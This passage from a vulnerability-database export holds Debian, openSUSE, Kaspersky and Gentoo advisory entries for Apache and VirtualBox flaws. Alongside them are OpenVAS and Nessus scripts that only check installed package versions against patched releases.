"Debian Security Advisory DSA 3980-1 (apache2 - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3980.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3980-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703980\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-9798\");\n script_name(\"Debian Security Advisory DSA 3980-1 (apache2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 00:00:00 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3980.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"apache2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 2.4.10-10+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.25-3+deb9u3.\n\nWe recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in 
memory\ndisclosure.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.25-3+deb9u3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-pristine\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-macro\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-proxy-html\", ver:\"2.4.10-10+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2018-04-24T05:30:38", "bulletinFamily": "unix", "cvelist": ["CVE-2018-2836", "CVE-2017-9798", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2017-3737", "CVE-2018-2837", 
"CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "This update for VirtualBox to version 5.1.36 fixes multiple issues:\n\n Security issues fixed:\n\n - CVE-2018-0739: Unauthorized remote attacker may have caused a hang or\n frequently repeatable crash (complete DOS)\n - CVE-2018-2830: Attacker with host login may have compromised Virtualbox\n or further system services after interaction with a third user\n - CVE-2018-2831: Attacker with host login may have compromised VirtualBox\n or further system services, allowing read access to some data\n - CVE-2018-2835: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2836: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2837: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2842: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2843: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2844: Attacker with host login may have gained control over\n VirtualBox and possibly further system services after interacting with a\n third user\n - CVE-2018-2845: Attacker with host login may have caused a hang or\n frequently repeatable crash (complete DOS), and perform unauthorized\n read and write operation to some VirtualBox accessible data\n - CVE-2018-2860: Privileged attacker may have gained control over\n VirtualBox and possibly further system services\n\n <a rel=\"nofollow\" 
href=\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-36781\">http://www.oracle.com/technetwork/security-advisory/cpuapr2018verbose-36781</a>\n 08.html\n <a rel=\"nofollow\" href=\"http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\">http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</a>\n #AppendixOVIR\n\n This update also contains all upstream fixes and improvements in the\n stable 5.1.36 release.\n\n", "edition": 1, "modified": "2018-04-24T03:20:04", "published": "2018-04-24T03:20:04", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00069.html", "id": "OPENSUSE-SU-2018:1057-1", "type": "suse", "title": "Security update for virtualbox (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-27T01:33:35", "bulletinFamily": "unix", "cvelist": ["CVE-2018-2836", "CVE-2018-3091", "CVE-2018-2687", "CVE-2018-2860", "CVE-2018-3055", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2698", "CVE-2018-2693", "CVE-2018-2845", "CVE-2018-2690", "CVE-2018-3086", "CVE-2018-2676", "CVE-2017-5715", "CVE-2018-2837", "CVE-2018-3089", "CVE-2018-0739", "CVE-2018-2688", "CVE-2018-3087", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2685", "CVE-2018-3085", "CVE-2018-2843", "CVE-2018-3005", "CVE-2018-3090", "CVE-2018-2686", "CVE-2018-2694", "CVE-2018-2689", "CVE-2018-3088"], "description": "This update for kbuild, virtualbox fixes the following issues:\n\n kbuild changes:\n\n - Update to version 0.1.9998svn3110\n - Do not assume glibc glob internals\n - Support GLIBC glob interface version 2\n - Fix build failure (boo#1079838)\n - Fix build with GCC7 (boo#1039375)\n - Fix build by disabling vboxvideo_drv.so\n\n virtualbox security fixes (boo#1101667, boo#1076372):\n\n - CVE-2018-3005\n - CVE-2018-3055\n - CVE-2018-3085\n - CVE-2018-3086\n - CVE-2018-3087\n - CVE-2018-3088\n - CVE-2018-3089\n - CVE-2018-3090\n - 
CVE-2018-3091\n - CVE-2018-2694\n - CVE-2018-2698\n - CVE-2018-2685\n - CVE-2018-2686\n - CVE-2018-2687\n - CVE-2018-2688\n - CVE-2018-2689\n - CVE-2018-2690\n - CVE-2018-2676\n - CVE-2018-2693\n - CVE-2017-5715\n\n virtualbox other changes:\n\n - Version bump to 5.2.16\n - Use %{?linux_make_arch} when building kernel modules (boo#1098050)\n - Fixed vboxguestconfig.sh script\n - Update warning regarding the security hole in USB passthrough.\n (boo#1097248)\n - Fixed include for build with Qt 5.11 (boo#1093731)\n - You can find a detailed list of changes\n [here](https://www.virtualbox.org/wiki/Changelog#v16)\n\n", "edition": 1, "modified": "2018-08-27T00:07:57", "published": "2018-08-27T00:07:57", "id": "OPENSUSE-SU-2018:2524-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00080.html", "title": "Security update for kbuild, virtualbox (important)", "type": "suse", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "kaspersky": [{"lastseen": "2020-09-02T11:49:10", "bulletinFamily": "info", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "description": "### *Detect date*:\n04/17/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Oracle VM VirtualBox. 
Malicious users can exploit these vulnerabilities to cause denial of service, obtain sensitive information, gain privileges, read and write local files.\n\n### *Affected products*:\nOracle VM VirtualBox 5.1.x earlier than 5.1.36 \nOracle VM VirtualBox 5.2.x earlier than 5.2.10\n\n### *Solution*:\nUpdate to the latest version \n[Download VirtualBox](<https://www.virtualbox.org/wiki/Downloads>)\n\n### *Original advisories*:\n[Oracle Critical Patch Update Advisory \u2013 April 2018](<http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Oracle VirtualBox](<https://threats.kaspersky.com/en/product/Oracle-VirtualBox/>)\n\n### *CVE-IDS*:\n[CVE-2018-2835](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2835>) 4.4 Warning \n[CVE-2018-2836](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2836>) 4.4 Warning \n[CVE-2018-2837](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2837>) 4.4 Warning \n[CVE-2018-0739](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739>) 4.3 Warning \n[CVE-2018-2842](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2842>) 4.6 Warning \n[CVE-2018-2843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2843>) 4.6 Warning \n[CVE-2018-2844](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2844>) 4.6 Warning \n[CVE-2018-2845](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2845>) 4.6 Warning \n[CVE-2018-2860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2860>) 4.6 Warning \n[CVE-2018-2830](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2830>) 4.4 Warning \n[CVE-2018-2831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2831>) 2.1 Warning", "edition": 36, "modified": "2020-05-22T00:00:00", "published": "2018-04-17T00:00:00", "id": "KLA11236", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11236", "title": "KLA11236 Multiple vulnerabilities in Oracle VM VirtualBox", "type": 
"kaspersky", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T06:57:51", "description": "The version of Oracle VM VirtualBox running on the remote host is\n5.1.x prior to 5.1.36 or 5.2.x prior to 5.2.10. It is, therefore,\naffected by multiple vulnerabilities as noted in the April 2018\nCritical Patch Update advisory. Please consult the CVRF details\nfor the applicable CVEs for additional information.\n\nNessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "cvss3": {"score": 8.2, "vector": "AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-10T00:00:00", "title": "Oracle VM VirtualBox 5.1.x < 5.1.36 / 5.2.x < 5.2.10 (April 2018 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:vm_virtualbox"], "id": "VIRTUALBOX_5_2_10.NASL", "href": "https://www.tenable.com/plugins/nessus/109682", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109682);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/05\");\n\n script_cve_id(\n \"CVE-2018-0739\",\n \"CVE-2018-2830\",\n \"CVE-2018-2831\",\n \"CVE-2018-2835\",\n \"CVE-2018-2836\",\n \"CVE-2018-2837\",\n \"CVE-2018-2842\",\n \"CVE-2018-2843\",\n \"CVE-2018-2844\",\n \"CVE-2018-2845\",\n \"CVE-2018-2860\"\n );\n script_bugtraq_id(\n 103518,\n 103853,\n 103854,\n 103855,\n 103856,\n 103857,\n 103858,\n 103859,\n 103860,\n 103861,\n 103863\n );\n\n script_name(english:\"Oracle VM VirtualBox 5.1.x < 5.1.36 / 5.2.x < 5.2.10 (April 2018 CPU)\");\n script_summary(english:\"Performs a version check on VirtualBox.exe\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle VM VirtualBox running on the remote host is\n5.1.x prior to 5.1.36 or 5.2.x prior to 5.2.10. It is, therefore,\naffected by multiple vulnerabilities as noted in the April 2018\nCritical Patch Update advisory. Please consult the CVRF details\nfor the applicable CVEs for additional information.\n\nNessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05e0bcf5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.virtualbox.org/wiki/Changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle VM VirtualBox version 5.1.36 / 5.2.10 or later as\nreferenced in the April 2018 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2860\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:vm_virtualbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"virtualbox_installed.nasl\", \"macosx_virtualbox_installed.nbin\");\n script_require_ports(\"installed_sw/Oracle VM VirtualBox\", \"installed_sw/VirtualBox\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = NULL;\napps = make_list('Oracle VM VirtualBox', 'VirtualBox');\n\nforeach app (apps)\n{\n if (get_install_count(app_name:app)) break;\n else app = NULL;\n}\n\nif (isnull(app)) audit(AUDIT_NOT_INST, 'Oracle VM VirtualBox');\n\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\n\n\n# 5.1.x < 5.1.36\nif (ver =~ '^5\\\\.1' && ver_compare(ver:ver, fix:'5.1.36', strict:FALSE) < 0) fix = '5.1.36';\n# 5.2.x < 5.2.10\nelse if (ver =~ '^5\\\\.2' && ver_compare(ver:ver, fix:'5.2.10', strict:FALSE) < 0) fix = '5.2.10';\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n\nport = 0;\nif (app == 'Oracle VM VirtualBox')\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\n\nreport =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\nexit(0);\n\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T02:55:26", "description": "The remote host is affected by the vulnerability described in GLSA-201805-08\n(VirtualBox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VirtualBox. 
Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker could take control of VirtualBox resulting in the execution\n of arbitrary code with the privileges of the process, a Denial of Service\n condition, or other unspecified impacts.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-23T00:00:00", "title": "GLSA-201805-08 : VirtualBox: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:virtualbox-bin", "p-cpe:/a:gentoo:linux:virtualbox"], "id": "GENTOO_GLSA-201805-08.NASL", "href": "https://www.tenable.com/plugins/nessus/109975", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201805-08.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109975);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/09/04 13:20:07\");\n\n script_cve_id(\"CVE-2018-2830\", \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\", \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2860\");\n script_xref(name:\"GLSA\", value:\"201805-08\");\n\n script_name(english:\"GLSA-201805-08 : VirtualBox: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201805-08\n(VirtualBox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VirtualBox. 
Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker could take control of VirtualBox resulting in the execution\n of arbitrary code with the privileges of the process, a Denial of Service\n condition, or other unspecified impacts.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201805-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All VirtualBox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-emulation/virtualbox-5.1.36'\n All VirtualBox binary users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=app-emulation/virtualbox-bin-5.1.36.122089'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/virtualbox\", unaffected:make_list(\"ge 5.1.36\"), vulnerable:make_list(\"lt 5.1.36\"))) flag++;\nif (qpkg_check(package:\"app-emulation/virtualbox-bin\", unaffected:make_list(\"ge 5.1.36.122089\"), vulnerable:make_list(\"lt 5.1.36.122089\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VirtualBox\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:39:59", "description": "This update for kbuild, virtualbox fixes the following issues :\n\nkbuild changes :\n\n - Update to version 0.1.9998svn3110\n\n - Do not assume glibc glob internals\n\n - Support GLIBC glob interface version 2\n\n - Fix build failure (boo#1079838)\n\n - Fix build with GCC7 (boo#1039375)\n\n - Fix build by disabling vboxvideo_drv.so\n\nvirtualbox security fixes (boo#1101667, boo#1076372) :\n\n - CVE-2018-3005\n\n - CVE-2018-3055\n\n - CVE-2018-3085\n\n - CVE-2018-3086\n\n - CVE-2018-3087\n\n - CVE-2018-3088\n\n - CVE-2018-3089\n\n - CVE-2018-3090\n\n - CVE-2018-3091\n\n - CVE-2018-2694\n\n - CVE-2018-2698\n\n - CVE-2018-2685\n\n - CVE-2018-2686\n\n - CVE-2018-2687\n\n - 
CVE-2018-2688\n\n - CVE-2018-2689\n\n - CVE-2018-2690\n\n - CVE-2018-2676\n\n - CVE-2018-2693\n\n - CVE-2017-5715\n\nvirtualbox other changes :\n\n - Version bump to 5.2.16\n\n - Use %(?linux_make_arch) when building kernel modules\n (boo#1098050)\n\n - Fixed vboxguestconfig.sh script\n\n - Update warning regarding the security hole in USB\n passthrough. (boo#1097248)\n\n - Fixed include for build with Qt 5.11 (boo#1093731)\n\n - You can find a detailed list of changes\n [here](https://www.virtualbox.org/wiki/Changelog#v16)", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-08-28T00:00:00", "title": "openSUSE Security Update : kbuild / virtualbox (openSUSE-2018-938) (Spectre)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-3091", "CVE-2018-2687", "CVE-2018-2860", "CVE-2018-3055", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2698", "CVE-2018-2693", "CVE-2018-2845", "CVE-2018-2690", "CVE-2018-3086", "CVE-2018-2676", "CVE-2017-5715", "CVE-2018-2837", "CVE-2018-3089", "CVE-2018-0739", "CVE-2018-2688", "CVE-2018-3087", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2685", "CVE-2018-3085", "CVE-2018-2843", "CVE-2018-3005", "CVE-2018-3090", "CVE-2018-2686", "CVE-2018-2694", "CVE-2018-2689", "CVE-2018-3088"], "modified": "2018-08-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:python-virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", 
